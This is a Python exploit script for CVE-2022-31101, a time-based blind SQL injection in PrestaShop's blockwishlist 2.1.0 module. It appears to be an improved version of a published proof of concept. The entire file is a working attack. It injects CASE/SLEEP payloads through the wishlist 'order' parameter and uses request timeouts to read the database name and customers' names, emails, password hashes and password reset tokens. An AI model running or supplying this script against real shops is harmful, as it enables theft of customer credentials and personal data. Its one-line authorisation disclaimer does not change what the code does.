PrestaShop blockwishlist module 2.1.0 - time-based blind SQL injection exploit (CVE-2022-31101)
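#!/usr/bin/env python3
"""PrestaShop blockwishlist 2.1.0 - time-based blind SQL injection (CVE-2022-31101).

Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi
Date: 29/07/22
Exploit Author: Karthik UJ (@5up3r541y4n)
Vendor Homepage: https://www.prestashop.com/en
Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0
Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/
Version (blockwishlist): 2.1.0
Version (prestashop): 1.7.8.1
Tested on: Linux
CVE: CVE-2022-31101

The ``order`` parameter of ``/module/blockwishlist/view`` ends up in an
ORDER BY clause (the payload below rides on it).  The script injects
``CASE WHEN (<condition>) THEN SLEEP(n)`` and treats an HTTP request that
exceeds the client timeout as "condition true".  That oracle is used to read
the current database name and the ``firstname``/``lastname``/``email``/
``passwd``/``reset_password_token`` columns of ``<prefix>customer`` one
character at a time.

Caveats a tester should know before running it:
  * the table prefix is assumed to be the PrestaShop default ``ps_``
    (``TABLE_PREFIX``);
  * the oracle is purely timing based: ``SLEEP_SECONDS`` must be larger than
    ``TIMEOUT_SECONDS`` or true conditions are missed, and a target whose
    normal latency approaches the timeout yields false positives;
  * customer ids are walked from 1 and the walk stops at the first id that
    does not exist, so a gap (deleted customer) ends the dump early;
  * every probe is one HTTP request; expect hundreds of requests per field.

Only run this against systems you are authorised to test.
"""

import functools
import sys
import urllib.parse

# --- tunables -------------------------------------------------------------

# A true condition makes MySQL sleep SLEEP_SECONDS; the HTTP client gives up
# after TIMEOUT_SECONDS.  Keep SLEEP_SECONDS > TIMEOUT_SECONDS: the original
# PoC used 7 vs 8, which only registers a hit when the sort expression is
# evaluated more than once or the network adds over a second.
SLEEP_SECONDS = 7
TIMEOUT_SECONDS = 5

# PrestaShop default table prefix; change if the target was installed with another.
TABLE_PREFIX = "ps_"

# Customer ids probed: 1 .. MAX_CUSTOMER_ID-1 (the original PoC stopped at 9).
MAX_CUSTOMER_ID = 10

# Upper bounds (exclusive) for the length search of each value.
MAX_DB_NAME_LENGTH = 65
MAX_NAME_LENGTH = 100
MAX_EMAIL_LENGTH = 320
MAX_HASH_LENGTH = 500
MAX_TOKEN_LENGTH = 500

# Characters tried at each position.  Name columns are compared without
# BINARY (case-insensitive under MySQL's default collations), so lower case
# is enough for them.
CHARSET = "abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&'*+/=?^`{|}~"
# Case-sensitive columns (email, password hash, reset token).  '.' is
# deliberately absent: the original PoC observed that a '.' inside the
# injected value makes the endpoint answer HTTP 500 (the module appears to
# split the order value on '.'), so '.' cannot be probed directly and is
# recorded by elimination instead (see enumerate_string's ``fallback``).
EMAIL_CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&'*+/=?^`{|}~"

# Injection skeleton.  The ORDER BY becomes:
#   p.name, (select case when (<cond>) then (SELECT SLEEP(n)) else 1 end
#            [from <table> where id_customer=<id>]); -- .asc
# The trailing ".asc" keeps the module's own "field.direction" handling happy.
PARAM = "&order="
CASE_START = "p.name, (select case when ("

# (label, column, charset, case_sensitive, fallback, max_length) for every
# customer column that is dumped, in the order the original PoC printed them.
CUSTOMER_COLUMNS = (
    ("Firstname", "firstname", CHARSET, False, "?", MAX_NAME_LENGTH),
    ("Lastname", "lastname", CHARSET, False, "?", MAX_NAME_LENGTH),
    ("Email", "email", EMAIL_CHARSET, True, ".", MAX_EMAIL_LENGTH),
    ("Password hash", "passwd", EMAIL_CHARSET, True, ".", MAX_HASH_LENGTH),
    ("Password reset token", "reset_password_token", EMAIL_CHARSET, True, ".", MAX_TOKEN_LENGTH),
)


# --- payload construction ---------------------------------------------------

def _sql_char(ch):
    """Quote a single character as a MySQL string literal.

    A bare ``'`` in the probe (as the original PoC sent it) is a syntax error,
    so names like O'Brien could never be recovered; doubling it is the
    standard SQL escape.
    """
    return "'" + ch.replace("'", "''") + "'"


def build_payload(url, condition, table=None, row_id=None):
    """Return the full probe URL for ``condition``.

    ``url`` is the wishlist endpoint including its own query string
    (e.g. ``http://site/module/blockwishlist/view?id_wishlist=1``); the
    injected value is appended as the ``order`` parameter, percent-encoded
    so that characters such as '#', '&', '+' and '%' inside ``condition``
    reach the server intact.  The original PoC sent them raw, so a '#' was
    dropped as a URL fragment and '&'/'+' were reinterpreted by the HTTP
    layer, i.e. those probes could never match.

    With ``table``/``row_id`` the CASE is evaluated against the single row of
    ``table`` whose ``id_customer`` equals ``row_id``; without them it is a
    bare scalar (used for ``database()``).
    """
    if table is None:
        tail = ") then (SELECT SLEEP(%d)) else 1 end); -- .asc" % SLEEP_SECONDS
    else:
        tail = ") then (SELECT SLEEP(%d)) else 1 end from %s where id_customer=%d); -- .asc" % (
            SLEEP_SECONDS, table, int(row_id))
    return url + PARAM + urllib.parse.quote(CASE_START + condition + tail, safe="")


# --- oracle-driven extraction (pure: no network, testable offline) ----------

def find_length(oracle, expr, max_length, min_length=0):
    """Return the smallest n in [min_length, max_length) with LENGTH(expr)=n, else None.

    ``oracle(condition) -> bool`` must answer whether the SQL condition holds.
    None means no length in range was confirmed: the value is NULL
    (LENGTH(NULL) is NULL and never equal to anything), it is longer than the
    bound, or the oracle is not discriminating (see SLEEP_SECONDS /
    TIMEOUT_SECONDS).  The original PoC fell through with a stale ``length``
    in that case and then enumerated ``max_length`` bogus positions.
    """
    for candidate in range(min_length, max_length):
        if oracle("LENGTH(%s)=%d" % (expr, candidate)):
            return candidate
    return None


def enumerate_string(oracle, expr, length, charset, case_sensitive=False, fallback="?", on_char=None):
    """Recover ``length`` characters of SQL expression ``expr`` through ``oracle``.

    For every position the characters of ``charset`` are tried in order until
    ``oracle`` confirms ``SUBSTRING(expr,pos,1)=<char>``; ``= BINARY`` is used
    when ``case_sensitive`` so that upper and lower case are told apart.
    A position where nothing in ``charset`` matches is recorded as
    ``fallback`` rather than dropped (the original PoC dropped it, which made
    the printed value shorter and misaligned).  ``on_char`` is called with
    each character as soon as it is known so progress can be shown.
    """
    comparator = "= BINARY " if case_sensitive else "="
    recovered = []
    for position in range(1, length + 1):
        found = fallback
        for candidate in charset:
            condition = "SUBSTRING(%s,%d,1)%s%s" % (expr, position, comparator, _sql_char(candidate))
            if oracle(condition):
                found = candidate
                break
        recovered.append(found)
        if on_char is not None:
            on_char(found)
    return "".join(recovered)


def dump_column(oracle, label, column, charset, case_sensitive, fallback, max_length, on_char=None):
    """Find the length of ``column`` for the row ``oracle`` is bound to, print it, then recover the value.

    Returns the recovered string, or None when no length in [0, max_length)
    was confirmed (typically a NULL reset token), in which case a message is
    printed instead of enumerating garbage.
    """
    length = find_length(oracle, column, max_length)
    if length is None:
        print("%s length: not found (NULL or >= %d)" % (label, max_length))
        return None
    print("%s length: %d" % (label, length))
    print("%s: " % label, end="", flush=True)
    value = enumerate_string(
        oracle, column, length, charset,
        case_sensitive=case_sensitive, fallback=fallback, on_char=on_char,
    )
    print()
    return value


# --- HTTP oracle -------------------------------------------------------------

def make_http_oracle(url, cookie, timeout=TIMEOUT_SECONDS):
    """Return ``probe(condition, table=None, row_id=None) -> bool`` backed by HTTP.

    The probe sends one GET for the payload and reports True only when the
    request timed out, i.e. MySQL slept because the condition held.  Any
    other outcome (2xx, 500, redirect) is False.  Network errors other than
    a timeout propagate, as in the original PoC; ``cookie`` is sent verbatim
    as the ``Cookie`` header (a logged-in session is needed to reach the
    wishlist view).
    """
    import requests  # third-party; imported here so the pure helpers above need no extra install

    headers = {"Cookie": cookie}

    def probe(condition, table=None, row_id=None):
        try:
            requests.get(build_payload(url, condition, table, row_id), headers=headers, timeout=timeout)
        except requests.exceptions.Timeout:
            return True
        return False

    return probe


# --- driver ------------------------------------------------------------------

def main():
    """Interactive driver: ask for the endpoint and a session cookie, then dump."""
    # Example endpoint: http://website.com/module/blockwishlist/view?id_wishlist=1
    url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ")
    cookie = input("Enter cookie value:\n")
    probe = make_http_oracle(url, cookie)

    def echo(ch):
        print(ch, end="", flush=True)

    print("\nFinding db name's length:")
    db_length = find_length(probe, "database()", MAX_DB_NAME_LENGTH, min_length=1)
    if db_length is None:
        # Nothing to enumerate if the oracle never fired: bail out with a hint
        # instead of the NameError the original PoC raised here.
        sys.exit(
            "No timing difference observed for LENGTH(database()) in 1..%d: target not "
            "vulnerable, cookie rejected, or SLEEP_SECONDS/TIMEOUT_SECONDS need tuning."
            % (MAX_DB_NAME_LENGTH - 1)
        )
    print("Length: ", db_length, "\n")
    print("Enumerating current database name:")
    enumerate_string(probe, "database()", db_length, CHARSET, on_char=echo)
    print()

    table = TABLE_PREFIX + "customer"
    print("\nEnumerating " + table + " table")
    for customer_id in range(1, MAX_CUSTOMER_ID):
        # Bind the oracle to one row; every column below is read from it.
        row = functools.partial(probe, table=table, row_id=customer_id)
        # A missing row makes the scalar subquery NULL, so no SLEEP: that is
        # the "does this id exist" test.  Note it also stops at the first gap.
        if not row("id_customer=%d" % customer_id):
            print("\nOnly %d records found. Exiting..." % (customer_id - 1))
            break
        print("\nid = %d" % customer_id)
        for label, column, charset, case_sensitive, fallback, max_length in CUSTOMER_COLUMNS:
            dump_column(row, label, column, charset, case_sensitive, fallback, max_length, on_char=echo)


if __name__ == "__main__":
    main()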